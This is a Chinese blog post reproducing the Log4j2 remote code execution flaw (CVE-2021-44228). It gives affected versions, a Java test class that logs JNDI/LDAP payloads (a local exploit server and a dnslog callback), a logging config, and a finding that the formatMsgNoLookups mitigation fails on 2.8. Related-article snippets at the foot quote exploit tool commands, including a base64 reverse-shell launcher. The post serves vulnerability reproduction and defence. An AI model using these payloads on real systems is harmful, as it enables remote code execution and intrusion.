Log4j2 RCE漏洞复现

最新推荐文章于 2024-05-08 17:40:54 发布
最新推荐文章于 2024-05-08 17:40:54 发布
阅读量4.4k 收藏 5
点赞数
分类专栏: cve漏洞复现 web安全 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/121866930
版权

复现一下这个让安全圈过年的漏洞Log4j2-rce

漏洞影响范围

2.0 <= Apache Log4j <= 2.15.0-rc1(1.x版本暂时未发现存在该问题)

漏洞复现

环境要求 JDK版本不高于11.0.1 8u191 7u201 6u211,复现环境使用8u181

完整代码

主要是用log4j跑一下payload,怎么搭JNDI的利用环境可以到我之前fastjson漏洞分析的文章中找下

public class LogRCE {
    private static final Logger logger = LogManager.getLogger(LogRCE.class);

    public static void main(String[] args) {
//      DNSLOG:${jndi:ldap://pn48a0.dnslog.cn/Exp}
//      POC:${jndi:ldap://127.0.0.1:1389/ExecTest}
        logger.info("sdfdsf${jndi:ldap://127.0.0.1:1389/ExecTest}");
//      jvm启动参数:-Dlog4j2.formatMsgNoLookups=true
    }
}

配置文件,将日志级别设成info,方便对所有日志等级进行测试

<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
    <Properties>
        <Property name="log.pattern">%d{YYYY-MM-DD HH:mm:ss.SSS} %-5level %class{36} %L %M - %msg%xEx%n</Property>
        <Property name="file.all.filename">log/all.log</Property>
        <Property name="file.all.pattern">log/all.%i.log.gz</Property>
        <Property name="file.err.filename">log/err.log</Property>
        <Property name="file.err.pattern">log/err.%i.log.gz</Property>
    </Properties>
    <Appenders>
        <Console name="console" target="SYSTEM_OUT">
            <PatternLayout pattern="${log.pattern}" />
        </Console>

        <RollingFile name="all" bufferedIO="true" fileName="${file.all.filename}" filePattern="${file.all.pattern}">
            <PatternLayout pattern="${log.pattern}"/>
            <Policies>
                <SizeBasedTriggeringPolicy size="1 MB"/>
            </Policies>
            <DefaultRolloverStrategy max="10"/>
        </RollingFile>

        <RollingFile name="err" bufferedIO="true" fileName="${file.err.filename}" filePattern="${file.err.pattern}">
            <PatternLayout pattern="${log.pattern}"/>
            <Policies>
                <SizeBasedTriggeringPolicy size="1 MB"/>
            </Policies>
            <DefaultRolloverStrategy max="10"/>
        </RollingFile>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="console" level="info"/>
            <AppenderRef ref="console" level="error"/>
        </Root>
    </Loggers>
</Configuration>

直接运行就可以触发
image-20211210225632640

使用JVM参数的应急措施不是所有版本有效

在众多厂商发布的通告中都提供了通过增加-Dlog4j2.formatMsgNoLookups=trueJVM启动参数的方式作为应急措施,但是经过测试只对2.11及以上版本有效(2.10 jar包下载失败没有测)

2.8版本添加参数没有效果
image-20211210231938853

分等级考试的佛
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2远程代码执行RCE漏洞复现(CVE-2021-44228)
m0_57379855的博客
03-06 587
RCE远程代码执行漏洞复现log4jLog4jLDAPJNDIJNDI注入漏洞流程Log4j影响范围和排查方法修复漏洞 Log4j Log for Java,Apach的开源日志记录组件,使用非常广泛 使用方法: 1.pom引入依赖 2.获得logger实例 3.logger.info() debug() error() warn() LDAP lightweight directory access protocol轻量级目录访问协议(目录服务)默认端口389 可以批量登录 JNDI LDAP目录服务,R
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Log4j高危漏洞复现及解决方案-----周瑜老师
12-13 3182
一、Log4j 二、漏洞复现 2.1 log4j版本 <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.14.0</version> </dependency>
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_84264010的博客
05-08 1167
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
log4j漏洞复现
Machine的博客
12-20 570
最近出现的log4j漏洞问题,抱着好奇的心态来重现下。 环境搭建及测试代码 本文采用的是SpringBoot 2.2.6版本加一个RMI服务重现BUG,方式是通过在微服务工程里打log日志,以触发远程服务调用漏洞。 省略搭建微服务的过程,我使用的是社区版idea 2020.3.4,大家同样使用社区版的话,建议安装Spring assistant插件,可以很方便的搭建Springboot工程。 因为目前已经有了新版本的修复,这里建议大家使用Springboot2.2.6.RELEASE版本,其中带的log.
Log4j2 RCE 简单复现
ChamZhiZe的博客
01-10 654
一:所以环境 java 1.8.0_u172+idea 注:高版本的java不行,最好是在java1.8.0_u140以前的版本复现。 二:复现过程 github上下载本次复现所需要的东西: 第一步 你需要知道你的IP地址,因为是本地复现,所以就是你本地的物理机IP,也可以是你服务器的IP地址,总之一定是自己的IP地址。你要是做一些坏事儿,铁手镯会带到你的手腕上,请你到里面喝喝茶。 第二步 开启你的LDAP服务,在文件加的POC文件夹下,通过cmd启动你的LDAP服务 java -jar JNDIExp
Log4j漏洞复现
m1287578441的博客
06-08 2937
Log4j漏洞复现
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4j log4j2 2.15.0漏洞解决
12-10
《深入解析Log4j与Log4j2 2.15.0漏洞及解决方案》 在信息技术领域,日志记录是系统监控、故障排查和安全分析的重要环节。Log4j和Log4j2作为Java平台广泛使用的日志框架,其性能高效、功能强大,深受开发者喜爱。...
Log4j2 RCE(CVE-2021-44228)漏洞复现
博客地址 www.sec0nd.top
02-23 2227
Log4j2 RCE(CVE-2021-44228)漏洞复现 文章目录Log4j2 RCE(CVE-2021-44228)漏洞复现准备环境复现过程:用JNDIExploit启动一个ldap的服务使用BP抓包工具构造一个请求不足总结 准备环境 Log4j2这个漏洞是我第一次复现,因为还未学到javaweb方面的东西,就一直搁置着这个 首先把师傅给的项目文件运行一下 发现报错,这里有一行不完整,因为我也不清楚这里应该是什么就先忽略了。 忽略这行不完整的,可以正常运行 下面状态栏可以看到打开了8080端口,
Log4j2_RCE漏洞复现
kukudeshuo的博客
12-20 1759
Log4j2_RCE漏洞复现 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html 复现过程 首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具 打开题目 先使用dnslog进行测试 ${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp} 填在账号输入的位置即可,密码随便填 然后点击提交 可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞 开启ldap和http服务
完整log4j漏洞复现
追风筝的摆渡人
12-30 2949
log4j2.X漏洞复现
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7825
log4j漏洞原理和靶场复现
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现(1)
2401_84281601的博客
05-02 37
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://刚才http服务的地址:端口号/#Exploit” 1389。java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “构造反弹shell的命令的base64编码” -A “攻击机ip”java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 攻击机ip。
log4j RCE 漏洞
b10d9的博客
12-19 4075
漏洞概述 记录本次log4j可以远程命令执行的漏洞。 CVE-2021-44228(log4shell):受影响版本:2.0-beta9(2013年9月发布)-2.14.1(2021年3月发布) CVE-2021-45046:受影响版本: 2.0-beta9 to 2.15.0, excluding 2.12.2 log4j是一款基于java的日志工具,是Apache logging server的一部分,是使用非常广泛的一种java日志框架,所以受影响范围极广。 漏洞原理 本次漏
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本,以避免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值